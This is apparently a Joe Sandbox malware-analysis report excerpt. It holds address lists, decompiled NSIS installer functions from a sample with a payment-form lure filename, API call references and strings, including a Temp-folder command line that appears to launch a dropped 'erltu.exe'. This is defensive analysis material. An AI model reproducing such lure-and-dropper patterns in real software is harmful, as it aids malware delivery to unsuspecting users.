0x00000000
0x0040684a
0x00000000
0x004064e6
0x004064e9
0x0040651f
0x0040664f
0x0040664f
0x0040664f
0x0040664f
0x00406652
0x00406652
0x00406655
0x00406657
0x004068e1
0x00000000
0x004068e1
0x0040665d
0x00406660
0x00000000
0x00000000
0x00406666
0x0040666a
0x0040666d
0x0040666d
0x0040666d
0x00000000
0x0040666d
0x004064eb
0x004064ed
0x004064ef
0x004064f1
0x004064f4
0x004064f5
0x004064f7
0x004064f9
0x004064fc
0x004064ff
0x00406515
0x0040651a
0x00406552
0x00406552
0x00406556
0x00406582
0x00406584
0x0040658b
0x0040658e
0x00406591
0x00406591
0x00406596
0x00406596
0x00406598
0x0040659b
0x004065a2
0x004065a5
0x004065d2
0x004065d2
0x004065d5
0x004065d8
0x0040664c
0x0040664c
0x0040664c
0x00000000
0x0040664c
0x004065da
0x004065e0
0x004065e3
0x004065e6
0x004065e9
0x004065ec
0x004065ef
0x004065f2
0x004065f5
0x004065f8
0x004065fb
0x00406614
0x00406616
0x00406619
0x0040661a
0x0040661d
0x0040661f
0x00406622
0x00406624
0x00406626
0x00406629
0x0040662b
0x0040662e
0x00406632
0x00406634
0x00406634
0x00406635
0x00406638
0x0040663b
0x004065fd
0x004065fd
0x00406605
0x0040660a
0x0040660c
0x0040660f
0x0040660f
0x0040663e
0x00406645
0x004065cf
0x004065cf
0x004065cf
0x004065cf
0x00000000
0x00406647
0x00000000
0x00406647
0x00406645
0x00406558
0x0040655b
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406571
0x00406571
0x00406574
0x0040657b
0x0040654f
0x0040654f
0x0040654f
0x0040654f
0x00000000
0x0040657d
0x00000000
0x0040657d
0x0040657b
0x00406501
0x00406504
0x00406506
0x00406509
0x00000000
0x00000000
0x00000000
0x00000000
0x004063f3
0x004063f3
0x004063f7
0x004068bd
0x00000000
0x004068bd
0x004063fd
0x00406400
0x00406403
0x00406406
0x00406408
0x00406408
0x00406408
0x0040640b
0x0040640e
0x00406411
0x00406414
0x00406417
0x0040641a
0x0040641b
0x0040641d
0x0040641d
0x0040641d
0x00406420
0x00406423
0x00406426
0x00406429
0x00406429
0x00406429
0x0040642c
0x00000000
0x00000000
0x00406670
0x00406670
0x00406670
0x00406674
0x00000000
0x00000000
0x0040667a
0x0040667d
0x00406680
0x00406683
0x00406685
0x00406685
0x00406685
0x00406688
0x0040668b
0x0040668e
0x00406691
0x00406694
0x00406697
0x00406698
0x0040669a
0x0040669a
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066ad
0x004066af
0x004066b2
0x00000000
0x004066b4
0x00000000
0x004066b4
0x004066b2
0x004068e7
0x00000000
0x00000000
0x00405f16

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e74e6640404211f02dbcf3e5cdd51f183378cde3108f959ef2b494a3a8ff7bc
Instruction ID: eeb6df0b4c754b004cb91f1e651764525fca86d3ed66ed31f7f656e6c0f0dc00
Opcode Fuzzy Hash: 4e74e6640404211f02dbcf3e5cdd51f183378cde3108f959ef2b494a3a8ff7bc
Instruction Fuzzy Hash: B7F17671D00269CBDF28CFA8C8946ADBBB0FF44305F25816ED856BB281D7385A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00403A22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00403A22(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420514 = _t35;
					if(_t115 == 0x110) {
						 *0x423f24 = _t125;
						 *0x420528 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f4f0 = _t91;
						E00403EF5(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423708); // executed
						 *0x4236ec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420514 = 1;
					}
					_t122 =  *0x409238; // 0x0
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423f40;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F41(0x40b);
						while(1) {
							_t37 =  *0x420514;
							 *0x409238 =  *0x409238 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x409238; // 0x0
							__eflags = _t39 -  *0x423f44; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x4236ec - _t133; // 0x7fffffff
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423f44; // 0x2
							__eflags =  *0x409238 - _t44; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t130 + 0x24)));
							_t116 =  *(_t130 + 0x14);
							_push(0x42b800);
							E00405B16(_t116, _t125, _t130);
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403EF5(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403EF5(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403EF5(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423fac - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403F17(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f4f0, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423fac - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420528);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f4f0);
							}
							E00403F2A();
							E00405AF4(0x420530, "fjvkkubvvke Setup");
							_push( *((intOrPtr*)(_t130 + 0x18)));
							_push( &(0x420530[lstrlenA(0x420530)]));
							E00405B16(0x420530, _t125, _t130);
							SetWindowTextA(_t125, 0x420530);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)), _t133);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x4236f8);
									 *0x41fd00 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f20,  *_t130 +  *0x423700 & 0x0000ffff, _t125,  *( *(_t130 + 4) * 4 + "=@@"), _t130);
									__eflags = _t73 - _t133;
									 *0x4236f8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403EF5(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x4236f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									E00401389( *((intOrPtr*)(_t130 + 0xc)), _t133);
									__eflags =  *0x4236ec - _t133; // 0x7fffffff
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x4236f8, 8);
									E00403F41(0x405);
									goto L58;
								}
								__eflags =  *0x423fac - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423fa0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x4236f8); // executed
						 *0x423f24 = _t133;
						EndDialog(_t125,  *0x41f8f8);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x4236f8, 0x40f, 0, 1);
						__eflags =  *0x4236ec - _t133; // 0x7fffffff
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420508, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420508,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F5C(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x4236f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423fac - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f8f8 = 1;
											L21:
											_push(0x78);
											L22:
											E00403ECE();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f8f8 = _t127;
										goto L21;
									}
									__eflags =  *0x409238 - _t133; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x4236f8);
						 *0x4236f8 = _a12;
						L58:
						_t141 =  *0x421530 - _t133; // 0x0
						if(_t141 == 0) {
							_t142 =  *0x4236f8 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421530 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403a2b
0x00403a34
0x00403b75
0x00403b79
0x00403b7d
0x00403b7f
0x00403b84
0x00403b8f
0x00403b9a
0x00403b9f
0x00403ba1
0x00403ba3
0x00403ba6
0x00403bab
0x00403bb9
0x00403bc6
0x00403bcd
0x00403bcd
0x00403bce
0x00403bce
0x00403bd3
0x00403bd9
0x00403be0
0x00403be6
0x00403be8
0x00403c28
0x00403c2d
0x00403c32
0x00403c32
0x00403c37
0x00403c40
0x00403c42
0x00403c47
0x00403c4d
0x00403c51
0x00403c51
0x00403c56
0x00403c5c
0x00000000
0x00000000
0x00403c62
0x00403c67
0x00403c6d
0x00000000
0x00000000
0x00403c73
0x00403c76
0x00403c79
0x00403c7e
0x00403c83
0x00403c86
0x00403c8c
0x00403c91
0x00403c94
0x00403c9a
0x00403c9f
0x00403ca2
0x00403ca8
0x00403cb0
0x00403cb6
0x00403cbc
0x00403cc0
0x00403cc7
0x00403cc7
0x00403cc7
0x00403cd1
0x00403ce3
0x00403cef
0x00403cf4
0x00403cfe
0x00403d04
0x00403d06
0x00403d0b
0x00403d08
0x00403d08
0x00403d08
0x00403d1b
0x00403d33
0x00403d35
0x00403d3b
0x00403d50
0x00403d3d
0x00403d46
0x00403d48
0x00403d48
0x00403d56
0x00403d66
0x00403d6b
0x00403d76
0x00403d77
0x00403d7e
0x00403d88
0x00403d8d
0x00403d8f
0x00000000
0x00403d95
0x00403d95
0x00403d97
0x00000000
0x00000000
0x00403d9d
0x00403da1
0x00403dc6
0x00403dcc
0x00403dd2
0x00403dd4
0x00000000
0x00000000
0x00403dfa
0x00403e00
0x00403e02
0x00403e07
0x00000000
0x00000000
0x00403e0d
0x00403e10
0x00403e13
0x00403e2a
0x00403e36
0x00403e4f
0x00403e59
0x00403e5e
0x00403e64
0x00000000
0x00000000
0x00403e6e
0x00403e79
0x00000000
0x00403e79
0x00403da3
0x00403da9
0x00000000
0x00000000
0x00403daf
0x00403db5
0x00000000
0x00000000
0x00000000
0x00403dbb
0x00403d8f
0x00403e86
0x00403e92
0x00403e99
0x00000000
0x00403bea
0x00403bea
0x00403bed
0x00403c20
0x00403c20
0x00403c22
0x00000000
0x00000000
0x00000000
0x00403c22
0x00403bf3
0x00403bf8
0x00403bfa
0x00000000
0x00000000
0x00403c0a
0x00403c12
0x00000000
0x00403c18
0x00403a46
0x00403a46
0x00403a4a
0x00403a4f
0x00403a5e
0x00403a5e
0x00403a67
0x00403a70
0x00403a7b
0x00403a7b
0x00403a87
0x00403aa3
0x00403aa6
0x00403ab9
0x00403abf
0x00403b62
0x00000000
0x00403b6b
0x00403ac5
0x00403ad2
0x00403ad4
0x00403ad6
0x00403af5
0x00403af5
0x00403af8
0x00403afd
0x00403b00
0x00403b10
0x00403b11
0x00403b13
0x00403b49
0x00403b5c
0x00000000
0x00403b5c
0x00403b15
0x00403b1b
0x00403b34
0x00403b39
0x00403b3b
0x00000000
0x00000000
0x00403b3d
0x00403b29
0x00403b29
0x00403b2b
0x00403b2b
0x00000000
0x00403b2b
0x00403b1e
0x00403b23
0x00000000
0x00403b23
0x00403b02
0x00403b08
0x00000000
0x00000000
0x00403b0a
0x00000000
0x00403b0a
0x00403afa
0x00000000
0x00403afa
0x00403ae0
0x00403ae7
0x00403aed
0x00403aef
0x00000000
0x00000000
0x00000000
0x00403aef
0x00403aab
0x00000000
0x00403a89
0x00403a8f
0x00403a99
0x00403e9f
0x00403e9f
0x00403ea5
0x00403ea7
0x00403ead
0x00403eb2
0x00403eb8
0x00403eb8
0x00403ead
0x00403ec2
0x00000000
0x00403ec2
0x00403a87

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A5E
ShowWindow.USER32(?), ref: 00403A7B
DestroyWindow.USER32 ref: 00403A8F
SetWindowLongA.USER32 ref: 00403AAB
GetDlgItem.USER32 ref: 00403ACC
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AE0
IsWindowEnabled.USER32(00000000), ref: 00403AE7
GetDlgItem.USER32 ref: 00403B95
GetDlgItem.USER32 ref: 00403B9F
KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403BB9
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C0A
GetDlgItem.USER32 ref: 00403CB0
ShowWindow.USER32(00000000,?), ref: 00403CD1
EnableWindow.USER32(?,?), ref: 00403CE3
EnableWindow.USER32(?,?), ref: 00403CFE
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D14
EnableMenuItem.USER32 ref: 00403D1B
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D33
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D46
lstrlenA.KERNEL32(00420530,?,00420530,fjvkkubvvke Setup), ref: 00403D6F
SetWindowTextA.USER32(?,00420530), ref: 00403D7E
ShowWindow.USER32(?,0000000A), ref: 00403EB2

Strings

fjvkkubvvke Setup, xrefs: 00403D60

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
String ID: fjvkkubvvke Setup
API String ID: 4050669955-1666661210
Opcode ID: 1ea3c2a88b1d1f312b806789cbcc4bcb404401e61963c7eaf7926aa73dfb699e
Instruction ID: a83dcc86622e640bdf6b153063aa13b6230d1eae5258657c65e28bef3e163658
Opcode Fuzzy Hash: 1ea3c2a88b1d1f312b806789cbcc4bcb404401e61963c7eaf7926aa73dfb699e
Instruction Fuzzy Hash: E8C1D171A04205BBDB21AF21ED45D2B7EBCEB44706F50053EF601B12F1C779AA829B1E

Uniqueness

Uniqueness Score: -1.00%

Function 004036A1 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 213
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E004036A1() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x423f28; // 0x6ddfd8
				_t20 = E00405DDA(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420530;
					"1033" = 0x7830;
					E004059DB(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420530, 0);
					__eflags =  *0x420530;
					if(__eflags == 0) {
						E004059DB(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072FE, 0x420530, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E00405A52("1033",  *_t20() & 0x0000ffff);
				}
				E00403955(_t75, _t87);
				_t24 =  *0x423f30; // 0x80
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x423fa0 = _t24 & 0x00000020;
				if(E004056C8(_t87, _t84) != 0) {
					L16:
					if(E004056C8(_t95, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E00405B16(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x423f20, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423708 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403955(_t75, __eflags);
							__eflags =  *0x423fc0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F71(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x4236ec; // 0x7fffffff
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420508, 5); // executed
							_t37 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x4236c0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x4236c0);
								 *0x4236e4 = _t85;
								RegisterClassA(0x4236c0);
							}
							_t39 =  *0x423700; // 0x0
							_t42 = DialogBoxParamA( *0x423f20, _t39 + 0x00000069 & 0x0000ffff, 0, E00403A22, 0); // executed
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423f20; // 0x400000
						 *0x4236d4 = _t28;
						_v20 = 0x624e5f;
						 *0x4236c4 = E00401000;
						 *0x4236d0 = _t75;
						 *0x4236e4 =  &_v20;
						if(RegisterClassA(0x4236c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420508 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f20, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x423f58; // 0x6df098
					_t78 = 0x422ec0;
					E004059DB( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422ec0, 0);
					_t61 =  *0x422ec0; // 0x43
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422ec1;
						 *((char*)(E00405612(0x422ec1, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405AF4(_t84, E004055E7(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E0040562E(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004036a7
0x004036b0
0x004036b7
0x004036b9
0x004036cd
0x004036df
0x004036e9
0x004036ee
0x004036f4
0x00403707
0x00403707
0x00403712
0x004036bb
0x004036c6
0x004036c6
0x00403717
0x0040371c
0x00403721
0x0040372a
0x00403736
0x004037bd
0x004037c5
0x004037c7
0x004037cd
0x004037ce
0x004037ce
0x004037e4
0x004037ea
0x004037f8
0x00403887
0x0040388f
0x00403899
0x0040389e
0x004038a4
0x00403923
0x00403928
0x0040392a
0x00403946
0x00000000
0x00403946
0x0040392c
0x00403932
0x0040393a
0x0040393a
0x00000000
0x00403932
0x004038ae
0x004038bf
0x004038c1
0x004038c3
0x004038ca
0x004038ca
0x004038d2
0x004038da
0x004038dc
0x004038de
0x004038e7
0x004038ea
0x004038f0
0x004038f0
0x004038f6
0x0040390f
0x00403919
0x00000000
0x0040391e
0x00403891
0x00403893
0x00000000
0x004037fe
0x004037fe
0x00403804
0x0040380e
0x00403816
0x00403820
0x00403826
0x00403834
0x0040394b
0x0040394b
0x00000000
0x0040394b
0x0040383a
0x00403843
0x00403882
0x00000000
0x00403882
0x0040373c
0x0040373c
0x00403741
0x00000000
0x00000000
0x00403746
0x0040374b
0x0040375b
0x00403760
0x00403767
0x00000000
0x00000000
0x0040376b
0x0040376d
0x0040377a
0x0040377a
0x00403782
0x00403788
0x004037b0
0x004037b8
0x00000000
0x0040379a
0x0040379b
0x004037a4
0x004037aa
0x004037ab
0x00000000
0x004037ab
0x004037a6
0x004037a8
0x00000000
0x00000000
0x00000000
0x004037a8
0x00403788

APIs

Part of subcall function 00405DDA: GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
Part of subcall function 00405DDA: LoadLibraryA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DF7
Part of subcall function 00405DDA: GetProcAddress.KERNEL32(00000000,454E5245), ref: 00405E08

lstrcatA.KERNEL32(1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000,00000006,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403712
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,?,?,?,C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,00000000,C:\Users\user\AppData\Local\Temp,1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000,00000006,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ), ref: 0040377D
lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,?,?,?,C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,00000000,C:\Users\user\AppData\Local\Temp,1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000), ref: 00403790
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph), ref: 0040379B
LoadImageA.USER32 ref: 004037E4

Part of subcall function 00405A52: wsprintfA.USER32 ref: 00405A5F

RegisterClassA.USER32 ref: 0040382B
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403843
CreateWindowExA.USER32 ref: 0040387C
ShowWindow.USER32(00000005,00000000), ref: 004038AE
LoadLibraryA.KERNELBASE(RichEd20), ref: 004038BF
LoadLibraryA.KERNEL32(RichEd32), ref: 004038CA
GetClassInfoA.USER32 ref: 004038DA
GetClassInfoA.USER32 ref: 004038E7
RegisterClassA.USER32 ref: 004038F0
DialogBoxParamA.USER32 ref: 0040390F

Strings

RichEd32, xrefs: 004038C5
.DEFAULT\Control Panel\International, xrefs: 004036FD
C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph, xrefs: 0040374B, 00403753, 00403760, 004037AA, 004037B0
RichEdit, xrefs: 004038E1
RichEd20, xrefs: 004038BA
.exe, xrefs: 0040378A
1033, xrefs: 004036C1, 0040370D
C:\Users\user\AppData\Local\Temp\, xrefs: 004036A5
RichEdit20A, xrefs: 004038D2, 004038D8
_Nb, xrefs: 0040383A, 0040383F
C:\Users\user\AppData\Local\Temp, xrefs: 00403721, 00403729, 004037B7, 004037BD, 004037CD
"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" , xrefs: 004036AD
Control Panel\Desktop\ResourceLocale, xrefs: 004036D5

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\#U00d6DEME FORMU.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 914957316-689777076
Opcode ID: 94a7eb4746df920d3ed3100e7a30cdef3532f41083eceb960059c7bdc3c8b9cf
Instruction ID: 396c3099e5e99d0af67321f2f40d51cf7d39f14f72ddbb9a737c40d3af2db82b
